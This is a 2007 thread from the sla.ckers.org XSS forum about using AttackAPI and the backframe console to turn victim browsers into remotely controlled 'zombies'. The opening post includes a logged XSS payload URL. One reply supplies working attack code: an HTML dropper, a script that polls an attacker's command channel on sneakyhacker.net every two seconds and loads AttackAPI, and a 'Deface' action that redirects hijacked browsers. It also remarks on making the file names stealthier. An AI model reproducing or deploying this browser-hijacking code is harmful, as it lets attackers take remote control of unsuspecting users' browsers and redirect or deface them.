Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
AttackAPI
Posted by: jamuse
Date: October 18, 2007 08:49AM

I'd like to use AttackAPI to demonstrate similar functionality to xss-
proxy. After reading Chapter 7 of the XSS attacks book and
http://www.gnucitizen.org/blog/persistent-bi-directional-communication-channels,
I'm still have the following questions:

1. When exploiting an XSS vuln what do I need to include in the payload to
zombiefy the victim browser?

2. I tried the controlling zombies example from the "XSS Attacks"
book: I opened firetest-interactive.htm on one browser and in the
Firebug console I typed: $A.zombiefy('http://localhost/channel.php');
I then opened another tab in firefox and sent the following request:
http:||localhost/channel.php?action=push&message=alert('Hi There!')
I did not see an alertbox with the message. What am I missing?

3. As mentioned above my end goal is to use $A.hijackView() to
transfer the victim browser view to another URL. How do I push such a
request to the victim browser?

Options: ReplyQuote
Re: AttackAPI
Posted by: rsnake
Date: October 26, 2007 11:47AM

Good question for PDP who wrote it! You should probably PM him: http://sla.ckers.org/forum/profile.php?13,156

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: AttackAPI
Posted by: jamuse
Date: October 28, 2007 10:41AM

Thanks, I tried emailing PDP, PMing, and even posted to the AttackAPI mailing list, but no dice. I did make some progress though, perhaps this may shed a little light on the problem. After I zombiefy a client, that client sends requests to /undefined, which results in a 404 (the full request is shown below)


(hxxp://localhost/undefined?action=pull&callback=AttackAPI.dom.spawnChannel.channels%5B0%5D.onpull&referrer=http%3A//localhost/xss.php%3Fxss%3D%253Cscript%2520src%3D%2522http%3A//localhost/attackapi/build/build/AttackAPI-standalone.js%2522%253E%253C/script%253E%253Cscript%253E%24A.zombiefy%28%27http%3A//localhost/attackapi/inf/channel.php%27%29%3B%253C/script%253E&__r=0.11533011800075277_1193523713500)


I imagine that the client should be requesting the /attackapi/inf/channel.php file instead, though I'm not sure why its requesting /undefined. Any ideas?

Options: ReplyQuote
Re: AttackAPI
Posted by: pipes
Date: November 07, 2007 09:45PM

This is a little something I drafted a while ago (modified), it may be of help. Please note this is a quick edit. The details are fake and it was written as a demo only :)

%%% The Payload %%%

In order to get backframe and AttackAPI working, you need to drop a payload. In this case we used a stock standard HTML file with a source element:

<!-- begin fun.html -->
<html>
<head>
<title>!</title>
<script type="text/javascript" src="sneakyhacker.js"></script>
</head>
<body>
You know, you are a fucking moron. End of discussion. -- George Ou to Peter Gutmann.
</body>
</html>
<!-- end fun.html -->

Taking a look at sneakyhacker.js (unobfuscated) there are two things. One, the connect (with 2second refresh) to our channel.php, the second is the loaded of AttackAPI:

// begin JS
setInterval (function () {
var script = document.createElement ("script");
script.src = 'http://sneakyhacker.net/channel/channel.php?action=pull'; // our
channel
script.differ = true;
script.type = 'text/Javascript';
window.onload = function () {
document.body.removeChild (script);
}

document.body.appendChild (script);
var script = document.createElement ("script");
script.src = 'http://sneakyhacker.net/channel/AttackAPI-standalone.js'; // prob
should make that a more stealthy name at some stage ;D
script.differ = true;
script.type = 'text/Javascript';
window.onload = function () {
document.body.removeChild (script);
}

document.body.appendChild (script);
}, 2000);
// end JS

When loading the above HTML file, we now have the client (with unique identifier) connecting to our channel on sneakyhacker.net every 2 seconds asking us for more instructions. We also have AttackAPI loaded into their browser. So now, we can call AttackAPI functions like so:

AttackAPI.<function>(<options>);


%%% The Attack Console %%%

The backframe attack console is located at
http://sneakyhacker.net/backframe/application.htm . Pretty boring looking
(and also a unstable version!!!) but there are some things you can do:

1) Access the channel, and get a list of clients:

- click add channel
- give it any name
- channel url: http://sneakyhacker.net/channel/channel.php

2) have a poke around the clients when they list.

3) Send a message to the client:

- Example message: alert('Oh hai!');

All in all, that isn't really that powerful. Backframe is a framework,
like metasploit it contains some 'fun' modules (or actions as they are
called), but you can't really do a lot with 'send message'. The
solution? Write your own actions :) Below is a quick defacement action
I wrote. Simply copy and paste the code into the shell (open shell),
and then when you look at the client list (click off the current
client first) a new action 'Deface' will appear. Punch in the url, hit
go and you then profit etc etc etc...

Example action:


Backframe.actions['Deface'] = function (channel, client, action) {
$('#interactive-pane').fadeOut(null, function () {
$(this).html('<form><label>URL</label><br/><input type="text"
name="Deface" id="Deface" style="width:100%;"></input><br/><input
value="Deface" type="button"/> <input value="Clear"
type="button"/></form>');
$(this).children('input[@value="Deface"]').click(function () {
channel.interactive_channel.push(client.value,
'window.location = "'+ $(this).siblings('input').val() +'";');
});
$(this).children('input[@value="Clear"]').click(function () {
$(this).siblings('Deface').val('');
});
$(this).fadeIn();
});
};

Cheers,
-P

Options: ReplyQuote
Re: AttackAPI
Posted by: pipes
Date: November 07, 2007 09:50PM

Forgot to add credit where credit due. PDP for writing the stuff and various google results for showing how backframe works ;)

Options: ReplyQuote


Sorry, only registered users may post in this forum.